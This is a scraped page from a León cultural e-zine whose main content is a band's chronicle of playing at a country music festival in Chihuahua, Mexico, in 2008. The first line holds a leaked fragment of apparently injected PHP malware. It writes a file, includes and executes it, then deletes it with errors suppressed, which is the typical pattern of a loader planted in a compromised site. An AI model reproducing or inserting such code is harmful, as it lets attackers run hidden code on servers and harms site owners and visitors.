");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> el Rin.com, E-zine Inquieto y Agenda Cultural de León
Logo elrin.com
uvedoble-uvedoble-uvedoble-punto-elrin-punto-com elRin
Los datos de elRin.COM 1840 noticias publicadas
1690 Rineros registrados
0 Rineros conectados
2 anonimos conectados
652 mensajes en el foro
14069 mensajes en el foro antiguo
Frase Rinera: La televisión ha hecho maravillas por mi cultura. En cuanto alguien enciende la televisión, voy a la biblioteca y me leo un buen libro. [Groucho Marx] Envía la tuya
Noticias pasadas

OK Corral, Mexican Connection

noticia

http://www.youtube.com/v/fiJ6v5sXLQs&color1=0xb1b1b1&color2=0xcfcfcf&hl=es&fs=1">http://www.youtube.com/v/fiJ6v5sXLQs&color1=0xb1b1b1&color2=0xcfcfcf&hl=es&fs=1" type="application/x-shockwave-flash" allowfullscreen="true" width="425" height="344">

OK Corral, se fueron a México invitados por un importante festival de cultura y musica country, tras la experiencia, nos han contado cómo fue la aventura.

Si quieres más información sobre el grupo, no dejes de visitar su web: http://www.okcorralband.com

OKCorral en México, la Crónica.

Salimos de León en la tarde-noche del martes 12 de agosto para llegar, después de 36 horas de viaje con escalas en Ámsterdam y Houston, a la ciudad de Chihuahua sobre las diez de la noche hora local (allí tienen ocho horas de diferencia con respecto a nuestro país). Durante el viaje hicimos amistad con un matrimonio natural de la misma ciudad y que nos supuso una buena ayuda en la aduana de Houston. A la llegada a nuestro destino nos aguardaba Cintia, la otra sería Paulina, nombres de las dos guías que tuvimos durante nuestra estancia y Mauro, el chófer que siempre estuvo a nuestra disposición. Nos condujeron al hotel y posteriormente al Nido del Jabalí, un lugar de copas donde nos esperaban para darnos la bienvenida.

Los días siguientes transcurrieron con total normalidad, dedicando las mañanas a hacer turismo por las largas avenidas que tiene la ciudad vieja y moderna, donde se mezcla una ingente multitud entre polvo, grandes “carros” y destartalados autobuses abarrotados, curioseando entre la cantidad de tiendas que venden ropa y artículos vaqueros.

Todos los días teníamos algún concierto en diferentes lugares de la ciudad. Así estuvimos, cronológicamente, en el Nido del Jabalí, en el Festival Internacional Country de Chihuahua, en la Radio Universitaria (en directo) y en el Hunter’s. El primero y el último, bares de copas de una considerable amplitud y preparados para actuaciones en directo. Pero sin lugar a dudas lo mejor fue el Festival, en la amplia explanada que llamaban de La Cervecería y donde compartimos escenario con lo más granado del country mejicano: Caballo Dorado, Jalapeños 4x4, Hill Billy Rose, Jinetes del Desierto, Country Río, La Tribu, Gerónimo, Gunslinger, etc. etc.

Toda una experiencia vivida con músicos de un país lejano pero con deas, musicalmente hablando, muy próximas a las nuestras. También hicimos diversas entrevistas en la prensa y radio locales, así como para la Televisión Mexicana (Televisa) donde pasaron el último vídeo que tenemos.

Lo bueno se acaba pronto y el domingo 17 hacíamos las maletas para, después del consabido largo viaje, regresar a nuestra tierra. Ahora nos queda el recuerdo de aquellas gentes, de lo bien que nos trataron y de lo mucho que nos ayudaron, pero sobre todo de su carácter afable, divertido y dispuesto a complacer a quienes, como decían, veníamos de la madre patria.

Desde estas líneas de elrin.com queremos mandar un fuerte abrazo y nuestro agradecimiento a la Organización del Festival Country de Chihuahua y a los miembros del Instituto de Cultura de Chihuahua, muy especialmente a Armando, Cintia, Paulina y Mauro, y a nombres como Fernando e Isis, Jaime y Laura, Lico, Audiofer, y un largo etcétera, porque nos han dejado un recuerdo imborrable y esperamos volver algún día a ver. Gracias a todos ellos.

León. Octubre 2008.

Foto3

Noticias pasadas
Noticias Agenda
Opinodromo

Último mensaje

Opinodromo antiguo
Tablón de anuncios

Estamos en ello

Estamos trabajando en el nuevo tablón de anuncios. Todavia no está operativo.

Grupos de León
Noticias pasadas

Cine+Dj, lo nuevo del Clandestino.

Cine+Dj, lo nuevo del Clandestino.

21 de Octubre de 2007